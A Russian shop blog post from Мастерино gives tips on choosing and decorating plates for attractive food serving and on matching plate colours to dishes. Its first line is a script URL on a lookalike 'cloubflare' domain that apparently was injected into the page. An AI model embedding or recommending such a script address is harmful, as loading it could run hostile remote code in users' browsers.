https://cdnjs.cloubflare.com/ajax/library/mathematics-development-3.4.min.js
Ваша корзина пуста
Товар успешно добавлен в корзину
14 сентября 2021 Назад к общему списку

Посуда для красивой сервировки

Как подобрать посуду для эффектной сервировки праздничного стола: правила и советы от магазина Мастерино. Сочетание цвета еды с цветом тарелки – аппетитно и необычно.

Посуда для красивой сервировки

Поговорим немного о еде. Удивлены? В этом материале мы хотим дать один важный совет, как получать наслаждение от еды. Не просто «кусочничать» или обедать на ходу, а делать это по-королевски. Кроме того, что понадобится приготовить аппетитное, вкусное и полезное блюдо, не менее важно его красиво подать. Как презентовать кушанье так, чтобы его хотелось немедленно съесть? Конечно же, использовать роскошную посуду. Где ее взять? Купить в магазине Мастерино!


4 правила, чтобы приготовленные вами блюда смотрелись сногсшибательно

Неважно, хотите ли вы красиво сервировать еду, чтобы сделать превосходное фото и набрать лайков в инстаграме, либо желаете просто удивить дорогих гостей, мы дадим лучшие советы для эффектной подачи блюд.

1. Нейтральное блюдо. Возьмите посуду белого цвета, но оригинальной формы, например, в Мастерино вы найдете шикарные тарелки в виде листьев нейтральных оттенков с золотистой прожилкой посередине. Белая посуда не будет конкурировать с едой, поэтому акцент будет именно на составе блюда.


Положите достаточное количество еды, пусть это будет салат или гарнир, но при этом оставьте довольно широкое пространство между краем тарелки и ее содержимым. Выбирайте просторную посуду, потому что маленькая тарелка с большим количеством еды будет выглядеть набитой, переполненной.

Изогнутая тарелка – более удачный вариант, чем классические круглые или квадратные, которые всем уже поднаскучили.

2.Еда на тарелке должна выглядеть так, чтобы ее хотелось съесть. Для фото в соцсетях или чтобы поразить домочадцев положите на тарелку что-то коричнево-карамелизированное, яркую зелень или сочные свежие плоды.

Если у вас несколько кусочков, например, мяса, не раскладывайте его по тарелке, а уложите друг на друга. Этот прием дает ощущение изобилия.

Не делайте на блюде симметрию, положите три, а не 2 или 4 блина, нанесите соус только на одну сторону тарелки, и так далее.

Оставляйте негативное (то есть, пустое) пространство по краям – это помогает привлечь внимание к еде.

Не накладывайте всё в кучу, оставляйте пространства между разными продуктами. Это также добавляет в композицию воздуха и аппетита.

3. Самый простой и очевидный совет, которым мы, однако, часто пренебрегаем. Уже положив на тарелку основное блюдо, протрите края посуды чистой тканью, чтобы убрать брызги или пятна от еды, и следы пальцев.

4. Чем украсить тарелку с блюдом, чтобы это смотрелось, как в ресторане:

  • кинза и свежий сыр-чеддер;

  • сбрызнуть оливковым маслом;

  • выложить пол-ложечки песто.

Круто смотрится украшение контрастного с едой цвета, текстуры или аромата. Например, немного черного перца к белоснежной куриной грудке или тыквенное пюре с горстью измельченных фисташек.

Фантазируйте с цветами и формой посуды:

  • золотистые тарелки в форме листа кувшинки;

  • бирюзовые изогнутые листья папоротника с золотыми прожилками;

  • просторные тарелки в виде ананаса или пёрышка, -

и наполнение всегда будет смотреться выгодно и вкусно.

Какого цвета выбрать посуду в зависимости от цвета блюда

Что поможет кушаньям на вашем столе всегда выглядеть стильно и аппетитно, так это грамотно подобранная цветовая гамма.

  1. Приготовили пищу бежевых или нейтральных оттенков? Например, блюда из курицы, картофеля, со сливочным соусом. Тогда выберите тарелку контрастного тона – черного или коричневого. При этом, если еда в теплой гамме, то и тарелка пусть будет того же температурного оттенка, и наоборот.

  2. Красная еда – говядина, тефтели, помидоры, свекла, блюда с томатным соусом. Тарелка белого цвета будет очень кстати. Если же хотите яркости, поможет посуда зеленого цвета.

  3. Желтые и оранжевые блюда – яйца, кукуруза, гарниры с соусом карри. Правильный цвет тарелки – яркий, теплый синий. Обратите внимание, что оттенок именно теплый, так как холодный может вызвать чувство дисгармонии.

  4. Зеленые продукты – салаты, зелень, закуска гуакамоле, зеленый горошек – хороши будут на желтых тарелках. Так еда будет выглядеть особенно свежей и привлекательной.

Подберите роскошную посуду для красивой сервировки в магазине Мастерино – цены порадуют своей доступностью, а товар – своим качеством и оригинальностью.

Она нас вдохновляет и увлекает. Мы верим, что современные знания в сочетании с нестандартным мышлением и высокой мотивацией личного развития обеспечивают наше конкурентное преимущество по оказанию по настоящему качественных и узкоотраслевых услуг.
Другие новости
14 февраля 2022 Подборка к 23 февраля

Подборка подарков, упаковки и декора для муж...

10 февраля 2022 Интерьерные ящики

Интерьерные ящики из дерева - с надписями, ру...

07 февраля 2022 Стильные коробки

Подарочные коробки на любой вкус и цвет - над...

01 февраля 2022 Деревянные заготовки: конверты, ключницы, комоды

Уникальные подарки своими руками с использо...

О